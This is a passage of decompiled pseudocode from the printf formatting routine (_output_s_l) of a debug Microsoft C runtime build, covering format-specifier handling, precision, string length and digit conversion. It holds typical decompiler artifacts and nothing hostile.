    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																	}
    																	goto L70;
    																case 3:
    																	L69:
    																	__eax =  *(__ebp - 0x10);
    																	__eax =  *(__ebp - 0x10) | 0x00000800;
    																	__eflags = __eax;
    																	 *(__ebp - 0x10) = __eax;
    																	goto L70;
    																case 4:
    																	goto L70;
    															}
    														case 7:
    															L71:
    															__ecx =  *((char*)(__ebp - 0x251));
    															 *(__ebp - 0x324) = __ecx;
    															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    															 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    															__eflags =  *(__ebp - 0x324) - 0x37;
    															if( *(__ebp - 0x324) > 0x37) {
    																while(1) {
    																	L190:
    																	__eflags =  *(_t701 - 0x28);
    																	if( *(_t701 - 0x28) != 0) {
    																		goto L216;
    																	}
    																	goto L191;
    																}
    															}
    															L72:
    															_t157 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    															__ecx =  *_t157 & 0x000000ff;
    															switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    																case 0:
    																	L123:
    																	 *(__ebp - 0x2c) = 1;
    																	__ecx =  *((char*)(__ebp - 0x251));
    																	__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    																	__eflags = __ecx;
    																	 *((char*)(__ebp - 0x251)) = __cl;
    																	goto L124;
    																case 1:
    																	L73:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																	__eflags =  *(__ebp - 0x10) & 0x00000830;
    																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																		__eax =  *(__ebp - 0x10);
    																		__eax =  *(__ebp - 0x10) | 0x00000800;
    																		__eflags = __eax;
    																		 *(__ebp - 0x10) = __eax;
    																	}
    																	goto L75;
    																case 2:
    																	L88:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																	__eflags =  *(__ebp - 0x10) & 0x00000830;
    																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) | 0x00000800;
    																		__eflags = __ecx;
    																		 *(__ebp - 0x10) = __ecx;
    																	}
    																	goto L90;
    																case 3:
    																	L147:
    																	 *(__ebp - 0x260) = 7;
    																	goto L149;
    																case 4:
    																	L81:
    																	__eax = __ebp + 0x14;
    																	 *(__ebp - 0x288) = E00B93D50(__ebp + 0x14);
    																	__eflags =  *(__ebp - 0x288);
    																	if( *(__ebp - 0x288) == 0) {
    																		L83:
    																		__edx =  *0xd121a0; // 0xb775a0
    																		 *(__ebp - 4) = __edx;
    																		__eax =  *(__ebp - 4);
    																		 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																		L87:
    																		goto L190;
    																	}
    																	L82:
    																	__ecx =  *(__ebp - 0x288);
    																	__eflags =  *(__ecx + 4);
    																	if( *(__ecx + 4) != 0) {
    																		L84:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																		__eflags =  *(__ebp - 0x10) & 0x00000800;
    																		if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																			 *(__ebp - 0xc) = 0;
    																			__edx =  *(__ebp - 0x288);
    																			__eax =  *(__edx + 4);
    																			 *(__ebp - 4) =  *(__edx + 4);
    																			__ecx =  *(__ebp - 0x288);
    																			__edx =  *__ecx;
    																			 *(__ebp - 0x24) =  *__ecx;
    																		} else {
    																			__edx =  *(__ebp - 0x288);
    																			__eax =  *(__edx + 4);
    																			 *(__ebp - 4) =  *(__edx + 4);
    																			__ecx =  *(__ebp - 0x288);
    																			__eax =  *__ecx;
    																			asm("cdq");
    																			 *__ecx - __edx =  *__ecx - __edx >> 1;
    																			 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																			 *(__ebp - 0xc) = 1;
    																		}
    																		goto L87;
    																	}
    																	goto L83;
    																case 5:
    																	L124:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																	__eax = __ebp - 0x248;
    																	 *(__ebp - 4) = __ebp - 0x248;
    																	 *(__ebp - 0x44) = 0x200;
    																	__eflags =  *(__ebp - 0x30);
    																	if( *(__ebp - 0x30) >= 0) {
    																		L126:
    																		__eflags =  *(__ebp - 0x30);
    																		if( *(__ebp - 0x30) != 0) {
    																			L129:
    																			__eflags =  *(__ebp - 0x30) - 0x200;
    																			if( *(__ebp - 0x30) > 0x200) {
    																				 *(__ebp - 0x30) = 0x200;
    																			}
    																			L131:
    																			__eflags =  *(__ebp - 0x30) - 0xa3;
    																			if( *(__ebp - 0x30) > 0xa3) {
    																				 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																				 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																				__eflags =  *(__ebp - 0x20);
    																				if( *(__ebp - 0x20) == 0) {
    																					 *(__ebp - 0x30) = 0xa3;
    																				} else {
    																					__eax =  *(__ebp - 0x20);
    																					 *(__ebp - 4) =  *(__ebp - 0x20);
    																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																					 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																				}
    																			}
    																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																			__eax =  *(__ebp + 0x14);
    																			__ecx =  *(__eax - 8);
    																			__edx =  *(__eax - 4);
    																			 *(__ebp - 0x2a8) =  *(__eax - 8);
    																			 *(__ebp - 0x2a4) =  *(__eax - 4);
    																			__ecx = __ebp - 0x40;
    																			_push(E00B7C680(__ebp - 0x40));
    																			__eax =  *(__ebp - 0x2c);
    																			_push( *(__ebp - 0x2c));
    																			__ecx =  *(__ebp - 0x30);
    																			_push( *(__ebp - 0x30));
    																			__edx =  *((char*)(__ebp - 0x251));
    																			_push( *((char*)(__ebp - 0x251)));
    																			__eax =  *(__ebp - 0x44);
    																			_push( *(__ebp - 0x44));
    																			__ecx =  *(__ebp - 4);
    																			_push( *(__ebp - 4));
    																			__edx = __ebp - 0x2a8;
    																			_push(__ebp - 0x2a8);
    																			__eax =  *0xd12188; // 0xddc09d6c
    																			__eax =  *__eax();
    																			__esp = __esp + 0x1c;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			__eflags =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__eflags =  *(__ebp - 0x30);
    																				if( *(__ebp - 0x30) == 0) {
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__edx =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__eax =  *0xd12194; // 0xddc09d6c
    																					__eax =  *__eax();
    																					__esp = __esp + 8;
    																				}
    																			}
    																			__ecx =  *((char*)(__ebp - 0x251));
    																			__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
    																			if( *((char*)(__ebp - 0x251)) == 0x67) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																				__eflags =  *(__ebp - 0x10) & 0x00000080;
    																				if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__eax =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__ecx =  *0xd12190; // 0xddc09d6c
    																					E00B849C0(__ecx) =  *__eax();
    																					__esp = __esp + 8;
    																				}
    																			}
    																			__edx =  *(__ebp - 4);
    																			__eax =  *( *(__ebp - 4));
    																			__eflags =  *( *(__ebp - 4)) - 0x2d;
    																			if( *( *(__ebp - 4)) == 0x2d) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																				__edx =  *(__ebp - 4);
    																				__edx =  *(__ebp - 4) + 1;
    																				__eflags = __edx;
    																				 *(__ebp - 4) = __edx;
    																			}
    																			__eax =  *(__ebp - 4);
    																			 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																			do {
    																				L190:
    																				__eflags =  *(_t701 - 0x28);
    																				if( *(_t701 - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			} while ( *(__ebp - 0x324) > 0x37);
    																			goto L72;
    																		}
    																		L127:
    																		__ecx =  *((char*)(__ebp - 0x251));
    																		__eflags = __ecx - 0x67;
    																		if(__ecx != 0x67) {
    																			goto L129;
    																		}
    																		L128:
    																		 *(__ebp - 0x30) = 1;
    																		goto L131;
    																	}
    																	L125:
    																	 *(__ebp - 0x30) = 6;
    																	goto L131;
    																case 6:
    																	L75:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																	__eflags =  *(__ebp - 0x10) & 0x00000810;
    																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																		__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																		 *(__ebp - 0x284) = __ax;
    																		__cl =  *(__ebp - 0x284);
    																		 *(__ebp - 0x248) = __cl;
    																		 *(__ebp - 0x24) = 1;
    																	} else {
    																		 *(__ebp - 0x280) = 0;
    																		__edx = __ebp + 0x14;
    																		__eax = E00B93D90(__ebp + 0x14);
    																		 *(__ebp - 0x258) = __ax;
    																		__eax =  *(__ebp - 0x258) & 0x0000ffff;
    																		__ecx = __ebp - 0x248;
    																		__edx = __ebp - 0x24;
    																		 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    																		__eflags =  *(__ebp - 0x280);
    																		if( *(__ebp - 0x280) != 0) {
    																			 *(__ebp - 0x28) = 1;
    																		}
    																	}
    																	__edx = __ebp - 0x248;
    																	 *(__ebp - 4) = __ebp - 0x248;
    																	while(1) {
    																		L190:
    																		__eflags =  *(_t701 - 0x28);
    																		if( *(_t701 - 0x28) != 0) {
    																			goto L216;
    																		}
    																		goto L191;
    																	}
    																case 7:
    																	L144:
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
    																	L153:
    																	__eflags =  *(_t701 - 0x10) & 0x00008000;
    																	if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    																		_t649 =  *(_t701 - 0x10) & 0x00001000;
    																		__eflags = _t649;
    																		if(_t649 == 0) {
    																			__eflags =  *(_t701 - 0x10) & 0x00000020;
    																			if(( *(_t701 - 0x10) & 0x00000020) == 0) {
    																				_t651 =  *(_t701 - 0x10) & 0x00000040;
    																				__eflags = _t651;
    																				if(_t651 == 0) {
    																					_t496 = E00B93D50(_t701 + 0x14);
    																					_t703 = _t703 + 4;
    																					__eflags = 0;
    																					 *(_t701 - 0x2b8) = _t496;
    																					 *(_t701 - 0x2b4) = 0;
    																				} else {
    																					_t580 = E00B93D50(_t701 + 0x14);
    																					_t703 = _t703 + 4;
    																					asm("cdq");
    																					 *(_t701 - 0x2b8) = _t580;
    																					 *(_t701 - 0x2b4) = _t651;
    																				}
    																			} else {
    																				_t698 =  *(_t701 - 0x10) & 0x00000040;
    																				__eflags = _t698;
    																				if(_t698 == 0) {
    																					_t581 = E00B93D50(_t701 + 0x14);
    																					_t703 = _t703 + 4;
    																					asm("cdq");
    																					 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
    																					 *(_t701 - 0x2b4) = _t698;
    																				} else {
    																					_t584 = E00B93D50(_t701 + 0x14);
    																					_t703 = _t703 + 4;
    																					asm("cdq");
    																					 *(_t701 - 0x2b8) = _t584;
    																					 *(_t701 - 0x2b4) = _t698;
    																				}
    																			}
    																		} else {
    																			_t587 = E00B93D70(_t701 + 0x14);
    																			_t703 = _t703 + 4;
    																			 *(_t701 - 0x2b8) = _t587;
    																			 *(_t701 - 0x2b4) = _t649;
    																		}
    																	} else {
    																		_t588 = E00B93D70(_t701 + 0x14);
    																		_t703 = _t703 + 4;
    																		 *(_t701 - 0x2b8) = _t588;
    																		 *(_t701 - 0x2b4) = _t647;
    																	}
    																	__eflags =  *(_t701 - 0x10) & 0x00000040;
    																	if(( *(_t701 - 0x10) & 0x00000040) == 0) {
    																		goto L170;
    																	}
    																case 8:
    																	L109:
    																	__ecx = __ebp + 0x14;
    																	 *(__ebp - 0x298) = E00B93D50(__ebp + 0x14);
    																	__eax = E00B97280();
    																	__eflags = __eax;
    																	if(__eax != 0) {
    																		L119:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																		__eflags =  *(__ebp - 0x10) & 0x00000020;
    																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																			__edx =  *(__ebp - 0x298);
    																			__eax =  *(__ebp - 0x24c);
    																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																		} else {
    																			__eax =  *(__ebp - 0x298);
    																			 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																		}
    																		 *(__ebp - 0x28) = 1;
    																		while(1) {
    																			L190:
    																			__eflags =  *(_t701 - 0x28);
    																			if( *(_t701 - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																	}
    																	L110:
    																	__edx = 0;
    																	__eflags = 0;
    																	if(0 == 0) {
    																		 *(__ebp - 0x32c) = 0;
    																	} else {
    																		 *(__ebp - 0x32c) = 1;
    																	}
    																	__eax =  *(__ebp - 0x32c);
    																	 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    																	__eflags =  *(__ebp - 0x29c);
    																	if( *(__ebp - 0x29c) == 0) {
    																		_push(L"(\"\'n\' format specifier disabled\", 0)");
    																		_push(0);
    																		_push(0x695);
    																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																		_push(2);
    																		__eax = L00B7D760();
    																		__esp = __esp + 0x14;
    																		__eflags = __eax - 1;
    																		if(__eax == 1) {
    																			asm("int3");
    																		}
    																	}
    																	__eflags =  *(__ebp - 0x29c);
    																	if( *(__ebp - 0x29c) != 0) {
    																		L118:
    																		while(1) {
    																			L190:
    																			__eflags =  *(_t701 - 0x28);
    																			if( *(_t701 - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																	} else {
    																		L117:
    																		 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																		__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																		 *(__ebp - 0x2f8) = 0xffffffff;
    																		__ecx = __ebp - 0x40;
    																		__eax = E00B7C650(__ecx);
    																		__eax =  *(__ebp - 0x2f8);
    																		goto L229;
    																	}
    																case 9:
    																	goto L0;
    																case 0xa:
    																	L146:
    																	 *(__ebp - 0x30) = 8;
    																	goto L147;
    																case 0xb:
    																	L90:
    																	__eflags =  *(__ebp - 0x30) - 0xffffffff;
    																	if( *(__ebp - 0x30) != 0xffffffff) {
    																		__edx =  *(__ebp - 0x30);
    																		 *(__ebp - 0x328) =  *(__ebp - 0x30);
    																	} else {
    																		 *(__ebp - 0x328) = 0x7fffffff;
    																	}
    																	__eax =  *(__ebp - 0x328);
    																	 *(__ebp - 0x290) =  *(__ebp - 0x328);
    																	__ecx = __ebp + 0x14;
    																	 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																	__eflags =  *(__ebp - 0x10) & 0x00000810;
    																	if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																		L101:
    																		__eflags =  *(__ebp - 4);
    																		if( *(__ebp - 4) == 0) {
    																			__edx =  *0xd121a0; // 0xb775a0
    																			 *(__ebp - 4) = __edx;
    																		}
    																		__eax =  *(__ebp - 4);
    																		 *(__ebp - 0x28c) =  *(__ebp - 4);
    																		while(1) {
    																			L104:
    																			__ecx =  *(__ebp - 0x290);
    																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																			__eflags = __ecx;
    																			if(__ecx == 0) {
    																				break;
    																			}
    																			L105:
    																			__eax =  *(__ebp - 0x28c);
    																			__ecx =  *( *(__ebp - 0x28c));
    																			__eflags = __ecx;
    																			if(__ecx == 0) {
    																				break;
    																			}
    																			L106:
    																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																			 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																		}
    																		L107:
    																		__eax =  *(__ebp - 0x28c);
    																		__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
    																		__eflags = __eax;
    																		 *(__ebp - 0x24) = __eax;
    																		goto L108;
    																	} else {
    																		L94:
    																		__eflags =  *(__ebp - 4);
    																		if( *(__ebp - 4) == 0) {
    																			__eax =  *0xd121a4; // 0xb77590
    																			 *(__ebp - 4) = __eax;
    																		}
    																		 *(__ebp - 0xc) = 1;
    																		__ecx =  *(__ebp - 4);
    																		 *(__ebp - 0x294) =  *(__ebp - 4);
    																		while(1) {
    																			L97:
    																			__edx =  *(__ebp - 0x290);
    																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																			 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																			__eflags =  *(__ebp - 0x290);
    																			if( *(__ebp - 0x290) == 0) {
    																				break;
    																			}
    																			L98:
    																			__ecx =  *(__ebp - 0x294);
    																			__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																			__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																			if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																				break;
    																			}
    																			L99:
    																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																			 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																		}
    																		L100:
    																		 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    																		__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    																		 *(__ebp - 0x24) = __ecx;
    																		L108:
    																		while(1) {
    																			L190:
    																			__eflags =  *(_t701 - 0x28);
    																			if( *(_t701 - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																	}
    																case 0xc:
    																	L145:
    																	 *((intOrPtr*)(__ebp - 8)) = 0xa;
    																	while(1) {
    																		L153:
    																		__eflags =  *(_t701 - 0x10) & 0x00008000;
    																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    																			_t649 =  *(_t701 - 0x10) & 0x00001000;
    																			__eflags = _t649;
    																			if(_t649 == 0) {
    																				__eflags =  *(_t701 - 0x10) & 0x00000020;
    																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
    																					_t651 =  *(_t701 - 0x10) & 0x00000040;
    																					__eflags = _t651;
    																					if(_t651 == 0) {
    																						_t496 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						__eflags = 0;
    																						 *(_t701 - 0x2b8) = _t496;
    																						 *(_t701 - 0x2b4) = 0;
    																					} else {
    																						_t580 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t580;
    																						 *(_t701 - 0x2b4) = _t651;
    																					}
    																				} else {
    																					_t698 =  *(_t701 - 0x10) & 0x00000040;
    																					__eflags = _t698;
    																					if(_t698 == 0) {
    																						_t581 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
    																						 *(_t701 - 0x2b4) = _t698;
    																					} else {
    																						_t584 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t584;
    																						 *(_t701 - 0x2b4) = _t698;
    																					}
    																				}
    																			} else {
    																				_t587 = E00B93D70(_t701 + 0x14);
    																				_t703 = _t703 + 4;
    																				 *(_t701 - 0x2b8) = _t587;
    																				 *(_t701 - 0x2b4) = _t649;
    																			}
    																		} else {
    																			_t588 = E00B93D70(_t701 + 0x14);
    																			_t703 = _t703 + 4;
    																			 *(_t701 - 0x2b8) = _t588;
    																			 *(_t701 - 0x2b4) = _t647;
    																		}
    																		__eflags =  *(_t701 - 0x10) & 0x00000040;
    																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
    																			goto L170;
    																		}
    																		goto L166;
    																	}
    																case 0xd:
    																	L148:
    																	 *(__ebp - 0x260) = 0x27;
    																	L149:
    																	 *((intOrPtr*)(__ebp - 8)) = 0x10;
    																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																	__eflags =  *(__ebp - 0x10) & 0x00000080;
    																	if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																		 *((char*)(__ebp - 0x14)) = 0x30;
    																		 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    																		__eflags =  *(__ebp - 0x260) + 0x51;
    																		 *((char*)(__ebp - 0x13)) = __al;
    																		 *(__ebp - 0x1c) = 2;
    																	}
    																	while(1) {
    																		L153:
    																		__eflags =  *(_t701 - 0x10) & 0x00008000;
    																		if(( *(_t701 - 0x10) & 0x00008000) == 0) {
    																			_t649 =  *(_t701 - 0x10) & 0x00001000;
    																			__eflags = _t649;
    																			if(_t649 == 0) {
    																				__eflags =  *(_t701 - 0x10) & 0x00000020;
    																				if(( *(_t701 - 0x10) & 0x00000020) == 0) {
    																					_t651 =  *(_t701 - 0x10) & 0x00000040;
    																					__eflags = _t651;
    																					if(_t651 == 0) {
    																						_t496 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						__eflags = 0;
    																						 *(_t701 - 0x2b8) = _t496;
    																						 *(_t701 - 0x2b4) = 0;
    																					} else {
    																						_t580 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t580;
    																						 *(_t701 - 0x2b4) = _t651;
    																					}
    																				} else {
    																					_t698 =  *(_t701 - 0x10) & 0x00000040;
    																					__eflags = _t698;
    																					if(_t698 == 0) {
    																						_t581 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t581 & 0x0000ffff;
    																						 *(_t701 - 0x2b4) = _t698;
    																					} else {
    																						_t584 = E00B93D50(_t701 + 0x14);
    																						_t703 = _t703 + 4;
    																						asm("cdq");
    																						 *(_t701 - 0x2b8) = _t584;
    																						 *(_t701 - 0x2b4) = _t698;
    																					}
    																				}
    																			} else {
    																				_t587 = E00B93D70(_t701 + 0x14);
    																				_t703 = _t703 + 4;
    																				 *(_t701 - 0x2b8) = _t587;
    																				 *(_t701 - 0x2b4) = _t649;
    																			}
    																		} else {
    																			_t588 = E00B93D70(_t701 + 0x14);
    																			_t703 = _t703 + 4;
    																			 *(_t701 - 0x2b8) = _t588;
    																			 *(_t701 - 0x2b4) = _t647;
    																		}
    																		__eflags =  *(_t701 - 0x10) & 0x00000040;
    																		if(( *(_t701 - 0x10) & 0x00000040) == 0) {
    																			goto L170;
    																		}
    																		goto L166;
    																	}
    																case 0xe:
    																	while(1) {
    																		L190:
    																		__eflags =  *(_t701 - 0x28);
    																		if( *(_t701 - 0x28) != 0) {
    																			goto L216;
    																		}
    																		goto L191;
    																	}
    															}
    														case 8:
    															L30:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    															goto L33;
    														case 9:
    															L31:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    															goto L33;
    														case 0xa:
    															L29:
    															__ecx =  *(__ebp - 0x10);
    															__ecx =  *(__ebp - 0x10) | 0x00000001;
    															 *(__ebp - 0x10) = __ecx;
    															goto L33;
    														case 0xb:
    															L28:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    															goto L33;
    														case 0xc:
    															L32:
    															__ecx =  *(__ebp - 0x10);
    															__ecx =  *(__ebp - 0x10) | 0x00000008;
    															__eflags = __ecx;
    															 *(__ebp - 0x10) = __ecx;
    															goto L33;
    														case 0xd:
    															L33:
    															goto L218;
    													}
    												} else {
    													if(0 == 0) {
    														 *(_t701 - 0x314) = 0;
    													} else {
    														 *(_t701 - 0x314) = 1;
    													}
    													_t618 =  *(_t701 - 0x314);
    													 *(_t701 - 0x278) =  *(_t701 - 0x314);
    													if( *(_t701 - 0x278) == 0) {
    														_push( &M00B77C38);
    														_push(0);
    														_push(0x460);
    														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    														_push(2);
    														_t545 = L00B7D760();
    														_t703 = _t703 + 0x14;
    														if(_t545 == 1) {
    															asm("int3");
    														}
    													}
    													L14:
    													if( *(_t701 - 0x278) != 0) {
    														goto L16;
    													} else {
    														 *((intOrPtr*)(L00B80C60(_t618))) = 0x16;
    														E00B809F0(_t589, _t618, _t699, _t700,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    														 *(_t701 - 0x2f0) = 0xffffffff;
    														E00B7C650(_t701 - 0x40);
    														_t518 =  *(_t701 - 0x2f0);
    														L229:
    														return E00B805D0(_t518, _t589,  *(_t701 - 0x48) ^ _t701, _t665, _t699, _t700);
    													}
    												}
    											}
    											L219:
    											__eflags =  *(_t701 - 0x25c);
    											if( *(_t701 - 0x25c) == 0) {
    												L222:
    												 *(_t701 - 0x334) = 1;
    												L223:
    												_t605 =  *(_t701 - 0x334);
    												 *(_t701 - 0x2e0) =  *(_t701 - 0x334);
    												__eflags =  *(_t701 - 0x2e0);
    												if( *(_t701 - 0x2e0) == 0) {
    													_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    													_push(0);
    													_push(0x8f5);
    													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    													_push(2);
    													_t523 = L00B7D760();
    													_t703 = _t703 + 0x14;
    													__eflags = _t523 - 1;
    													if(_t523 == 1) {
    														asm("int3");
    													}
    												}
    												__eflags =  *(_t701 - 0x2e0);
    												if( *(_t701 - 0x2e0) != 0) {
    													 *(_t701 - 0x300) =  *(_t701 - 0x24c);
    													E00B7C650(_t701 - 0x40);
    													_t518 =  *(_t701 - 0x300);
    												} else {
    													 *((intOrPtr*)(L00B80C60(_t605))) = 0x16;
    													E00B809F0(_t589, _t605, _t699, _t700, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    													 *(_t701 - 0x2fc) = 0xffffffff;
    													E00B7C650(_t701 - 0x40);
    													_t518 =  *(_t701 - 0x2fc);
    												}
    												goto L229;
    											}
    											L220:
    											__eflags =  *(_t701 - 0x25c) - 7;
    											if( *(_t701 - 0x25c) == 7) {
    												goto L222;
    											}
    											L221:
    											 *(_t701 - 0x334) = 0;
    											goto L223;
    										}
    									}
    									L187:
    									__eflags =  *(_t701 - 0x24);
    									if( *(_t701 - 0x24) == 0) {
    										L189:
    										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
    										 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
    										_t639 =  *(_t701 - 0x24) + 1;
    										__eflags = _t639;
    										 *(_t701 - 0x24) = _t639;
    										goto L190;
    									}
    									L188:
    									__eflags =  *((char*)( *((intOrPtr*)(_t701 - 4)))) - 0x30;
    									if( *((char*)( *((intOrPtr*)(_t701 - 4)))) == 0x30) {
    										goto L190;
    									}
    									goto L189;
    								}
    								L183:
    								asm("cdq");
    								_t658 =  *(_t701 - 0x2c0);
    								 *(_t701 - 0x2ac) = E00B855B0(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
    								asm("cdq");
    								 *(_t701 - 0x2c0) = E00B85630( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
    								 *(_t701 - 0x2bc) = _t658;
    								__eflags =  *(_t701 - 0x2ac) - 0x39;
    								if( *(_t701 - 0x2ac) > 0x39) {
    									_t662 =  *(_t701 - 0x2ac) +  *((intOrPtr*)(_t701 - 0x260));
    									__eflags = _t662;
    									 *(_t701 - 0x2ac) = _t662;
    								}
    								 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *(_t701 - 0x2ac);
    								 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
    								L181:
    								_t657 =  *(_t701 - 0x30) - 1;
    								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
    								__eflags =  *(_t701 - 0x30);
    								if( *(_t701 - 0x30) > 0) {
    									goto L183;
    								}
    								goto L182;
    							}
    						}
    						L168:
    						__eflags =  *(_t701 - 0x2b8);
    						if( *(_t701 - 0x2b8) >= 0) {
    							goto L170;
    						}
    						goto L169;
    						L170:
